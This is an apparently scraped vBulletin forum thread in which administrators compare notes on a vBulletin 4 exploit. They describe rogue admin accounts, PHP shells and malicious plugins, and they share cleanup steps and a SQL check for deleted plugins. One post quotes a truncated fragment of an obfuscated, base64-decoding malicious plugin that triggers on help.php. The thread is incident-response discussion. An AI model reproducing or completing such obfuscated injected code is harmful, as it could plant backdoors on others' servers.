http://www.vbulletin.com/forum/forum...92#post3993992

I see it so many times..... Too many times infact....
But that is all I see......

I have no htaccess things that I have done, I don't know how to do it. I have no hacks, no new admins, plugins, defacement issues. No intrusions whatsoever.
I did remove the install folder at a very early stage in this recent exploit..

Maybe I have been lucky so far? Maybe I just don't see what I am supposed to be looking for..? Maybe it will happen to me soon?

There really is no finite explanation/solution here....

On my hacked forum, I found that they had uploaded some PHP shell scripts. If you don't remove those shell scripts, you could be in a world of hurt. Those shells can give them access to modify almost anything on your server - not just vBulletin. Here's everything I did to clean this up:

• remove vBulletin install directory
• change the admin password
• change MySQL password
• remove hacker admin accounts
• remove uploaded shell scripts
• remove hacker plugins
• remove hacker language variables
• remove hacker notices
• remove hacker announcements
• block IP ranges that accessed the upgrade.php file or shell scripts

Shocked to find this thread.

The late notification from VB gave no information at all, just 'delete install'. Given that I had no signs of a hack, I did it and moved on.

I came across this thread tonight and yes, like everyone else I have new admin users. In my case they don't seem to have done anything, perhaps because my admincp is renamed and well protected. Fingers crossed. I still have some checking to do, but it's looking promising.

Just in case any of the VB staff are still monitoring this, your response has been very poor. It would take minimal effort to add some detail to your exploit report, or send a second email once the level of detail in this thread became available. There are no doubt plenty of forum admins out there who are happily going about their business safe in the knowledge that the exploit was sorted and no damage done. And plenty of those will have some new administrators and plugins to keep them company.

I have been teetering on the edge of jumping ship given the progress of VB5 and because VB4 seems to no longer be in development. VBSEO also in troubled water. The appalling response to this exploit, coupled with some pretty 'f*** you' type responses from the staff in the discussions of this make me really keen to get on and use that Xenforo license I bought a couple of months ago.

Edit: to add something constructive to my whinge, I did what maybe a useful plugin check for others. I looked at the sequence of plugin IDs in the prefix_plugin table, ordering by the id descending. Then I looked at the next auto_increment id and make sure that there isn't a gap between the last known, trusted plugin created and the next ID. If there is a gap, then there is a chance that something has been created and then deleted. Get the auto_increment id using:

SELECT `AUTO_INCREMENT` FROM information_schema.`TABLES` WHERE TABLE_SCHEMA = 'your_database' AND TABLE_NAME = 'yourprefix_plugin';

I also checked the controlpanel log for gaps over the periods from registration to most recent activity of my new admin users. That would give an idea if something was done, then the log pruned.

Edit 2: I do have an entry in my control panel log for a user called . , one of the new administrators. He accessed forum.php on 1 Sep and the action was 'modify'. However if I search for that or the email address given in my server logs, I can't find an entry. Can anyone shed any light on how that could be? Of any way of checking what the modify actually was?

I had him get on my site too, but no damage was done... because I always double bag it.

NEVER EVER EVER EVER trust the security of vbulletin, wordpress, oscommerce, whatever, any software you install on your website. NEVER trust it. Always double up the admin login with .htaccesss password protection.

I had admin accounts created on my website but, because I had password protected the admincp, they were never able to do anything. These aren't real hackers, they're script kiddies, they get a recipe off a black hat website and follow it. Double bagging might not stop a real determined hacker, but it'll stop these people.

Another thing is to remove vbulletin's display of version information from public pages, which means they won't find your forum when they search for the specific version they have the exploit for.

Someone may have mentioned these things already, I've not read the whole thread yet. But they bare repeating in anycase.

Also yes, when an exploit is found, give more details, tell us what to look for.

Removing your version number, won't really do much, there are still plenty of ways to find your site, so that is sort of moot.
We only give enough information, so as to make sure you're aware of the exploit. Full Disclosure only helps the people who really want to attack you guys. Not our customers.

See http://www.vbulletin.com/forum/forum...47#post3994147

Please check admincp/help.php, by clicking the "?" somewhere in the admin control panel. I've downloaded yesterday the 4.2.x version and it shows up a very bad page!
I noticed a plugin change with the following code:

if (strpos($_SERVER['PHP_SELF'],"help.php")) {
if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260) ;$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T 0......

It seems that when accessing the HELP page, the plugin starts up some bad code.

That is just great - I own my forum, but I do not know how to do that. Is VB going to cover the cost for me to pay my IT guy to do this for me? This is the 11th and I did not here anything about this until I* was hacked. I can't even access my site at this point. I own 7 VB sites - should I expect the other 6 to be trashed too????

How do I remove this?? vbulletin-forumhome.js File not recognized as part of vBulletin